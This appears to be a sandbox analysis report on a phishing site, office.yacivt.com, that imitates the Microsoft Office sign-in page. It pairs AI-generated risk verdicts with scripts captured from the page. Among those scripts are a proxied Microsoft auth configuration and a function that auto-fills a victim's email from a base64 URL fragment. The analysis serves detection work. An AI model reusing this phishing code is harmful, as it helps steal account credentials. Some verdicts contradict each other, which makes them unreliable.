"reasoning": "The provided JavaScript snippet appears to be a utility library for managing asynchronous script loading and execution. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or redirects to malicious domains. The script uses standard web APIs and practices, such as DOM manipulation and event handling, which are common in legitimate web applications. While it uses some legacy APIs like `XDomainRequest`, the overall behavior is consistent with a script focused on improving web page performance and loading. Therefore, this script is assessed as low risk."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("integrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script appears to be a configuration object for a web application, but it contains several indicators that raise moderate security concerns. The script includes external data transmission to the `aadcdn.msauth.net` domain, which could potentially be used for data exfiltration. Additionally, the script uses obfuscated URLs and contains a redirect to the `react.yacivt.com` domain, which is of unknown reputation. While the script may have legitimate purposes, the combination of these behaviors warrants further investigation to ensure there are no malicious intentions."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://aadcdn.msauth.net/shared/1.0/","urlDefaultFavicon":"https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/v2.0/authorize?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026mkt=en-US\u0026nonce=638700663924236788.M2JhMTQ3M2MtOTY5ZS00ODU1LWFkZGEtNDA3N2M2NjI0MGM0MTEwZDlkOTEtMWY3Yi00NmNmLWE3ZjMtOTA3MTZiN2YzMjJj\u0026redirect_uri=https%3a%2f%2freact.yacivt.com%2flandingv2\u0026response_mode=form_post\u0026response_type=code+id_token\u0026scope=openid+profile+https%3a%2f%2freact.yacivt.com%2fv2%2fOfficeHome.All\u0026state=l6BTM8D70dyZpNtlmK9yP7pGcVJJkYIuCnzjG4ZCjnuNmRf69zWEx5SNwmNeeCLEHhtNj3-XJVrZR76PiFDwL1SwilGZk2eEVrXFdAiBU72BufoEi41Y172sL8lPoxuYI8o6qHDNnvcdKMbCR0XzEc-yC94Vsm8XhjIPAE1BAsxOTqaWVneplzoe-4aZvR8YHENzT2sxUahoRcn7Lzj6NsqiVdwQAWKX7W4gtrPqy8-ovgh1zOZRXMDyCt-8tXE-A2110vJYi2der3W4JaYeVg\u0026ui_locales=en-US\u0026x-client-SKU=ID_NET8_0\u0026x-client-ver=7.5.1.0\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://office.yacivt.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026origin=office.yacivt.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeZpn0V2Qmk6ddyuxKMT9QVwEREbEVY5iRFcq7HnzXorFYnqsFn0rsY0KcHnIHBsK76BmeRkFs4WeQh5DX8jXIJ2KNNdgeA6g68K7pslzqlP0EjxrPz-d0E-6I_LU8xRQmIz_tyEY1fxxxidzOQ3MFzuW_OajrG5jjU19zlF3F_klKoidaO2D6nD34ZwNj5MKv3i5jdVGVyKbT6h1ZiZo
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The script appears to be attempting to automatically fill in user credentials and submit a login form, which is a common phishing technique. Additionally, the script uses obfuscated code and base64 encoding, further raising suspicion. While the script may have a legitimate purpose, the overall behavior and lack of transparency suggest a high-risk scenario that requires further investigation."
} |
function lp(){
var emailId = document.querySelector("#i0116");
var nextButton = document.querySelector("#idSIButton9");
var query = window.location.href;
if (/#/.test(window.location.href)){
var res = query.split("#");
var data1 = res[0];
var data2 = res[1];
console.log(data1);
console.log(data2);
if (emailId != null) {
var decodedString = data2;
if (/^[A-Za-z0-9+/=]+$/.test(data2)) { // check if string is base64 encoded
try {
decodedString = window.atob(data2.replace(/[=]/gi, ''));
} catch (e) {
console.error('Error decoding base64 string:', e);
}
}
emailId.focus();
emailId.value = decodedString;
nextButton.focus();
nextButton.click();
console.log("YES!");
return;
}
}
setTimeout(function(){lp();}, 500);
}
setTimeout(function(){lp();}, 500);
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a combination of utility functions and event handlers related to document loading and ready state. While it does not exhibit any high-risk behaviors, there are some moderate-risk indicators that warrant further review:
1. The script uses the `$Do` object, which is a custom utility for managing asynchronous function calls. This is a moderate-risk indicator as it could potentially be used for aggressive DOM manipulation or external data transmission.
2. The script registers event handlers for 'DOMContentLoaded' and 'load' events, which is a common practice for tracking document loading. However, the purpose of the data being transmitted is unclear.
Overall, the script seems to be focused on document lifecycle management, but the lack of transparency around the data being transmitted and the use of a custom utility object result in a medium-risk score. Further investigation may be needed to determine the full scope and intent of this script."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded"
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script appears to be a configuration object for a web application, with various settings and parameters. While it does not contain any obvious high-risk indicators, there are some moderate-risk behaviors that warrant further review:
1. External Data Transmission (+2 points): The script sends user data to external domains like 'aadcdn.msauth.net' and 'office.yacivt.com' via various API calls and redirects.
2. Fallback Domains (+2 points): The script uses multiple fallback domains, some of which may be of unknown or dubious reputation.
3. Tracking Behavior (+1 point): The script includes analytics and telemetry functionality, which could potentially be used for tracking user behavior.
Overall, the script appears to be part of a legitimate web application, but the external data transmission and use of fallback domains raise some concerns that require further investigation to ensure there are no hidden malicious behaviors."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://aadcdn.msauth.net/shared/1.0/","urlDefaultFavicon":"https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/v2.0/authorize?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026mkt=en-US\u0026nonce=638700663924236788.M2JhMTQ3M2MtOTY5ZS00ODU1LWFkZGEtNDA3N2M2NjI0MGM0MTEwZDlkOTEtMWY3Yi00NmNmLWE3ZjMtOTA3MTZiN2YzMjJj\u0026redirect_uri=https%3a%2f%2freact.yacivt.com%2flandingv2\u0026response_mode=form_post\u0026response_type=code+id_token\u0026scope=openid+profile+https%3a%2f%2freact.yacivt.com%2fv2%2fOfficeHome.All\u0026state=l6BTM8D70dyZpNtlmK9yP7pGcVJJkYIuCnzjG4ZCjnuNmRf69zWEx5SNwmNeeCLEHhtNj3-XJVrZR76PiFDwL1SwilGZk2eEVrXFdAiBU72BufoEi41Y172sL8lPoxuYI8o6qHDNnvcdKMbCR0XzEc-yC94Vsm8XhjIPAE1BAsxOTqaWVneplzoe-4aZvR8YHENzT2sxUahoRcn7Lzj6NsqiVdwQAWKX7W4gtrPqy8-ovgh1zOZRXMDyCt-8tXE-A2110vJYi2der3W4JaYeVg\u0026ui_locales=en-US\u0026x-client-SKU=ID_NET8_0\u0026x-client-ver=7.5.1.0\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://office.yacivt.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026origin=office.yacivt.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeZpn0V2Qmk6ddyuxKMT9QVwEREbEVY5iRFcq7HnzXorFYnqsFn0rsY0KcHnIHBsK76BmeRkFs4WeQh5DX8jXIJ2KNNdgeA6g68K7pslzqlP0EjxrPz-d0E-6I_LU8xRQmIz_tyEY1fxxxidzOQ3MFzuW_OajrG5jjU19zlF3F_klKoidaO2D6nD34ZwNj5MKv3i5jdVGVyKbT6h1ZiZoSJCAA","canary":"ffbnXLSdy9Zqh8N6Cat8qYreIXz2qtzZU6qGKSUXEPs=7:1:CANARY:G16ietcmtvOp2ZGinIO20HVNMl3o/5cBYqDlePEjmD8=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","sessionId":"de1be4b4-6163-47f8-878d-d69a85427800","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://office.yacivt.com/common/instrumentation/reportpageload","dssost |
URL: https://office.yacivt.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHo Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://office.yacivt.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHo Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://office.yacivt.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHo Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'office.yacivt.com' does not match the legitimate domain 'microsoft.com'.", "The domain 'yacivt.com' is not associated with Microsoft, which is suspicious.", "The use of 'office' as a subdomain could be an attempt to mimic Microsoft's Office services.", "The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts." ], "riskscore": 9}
Google indexed: False |
URL: office.yacivt.com
Brands: Microsoft
Input Fields: Email, phone, or Skype |
URL: https://yacivt.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://yacivt.com |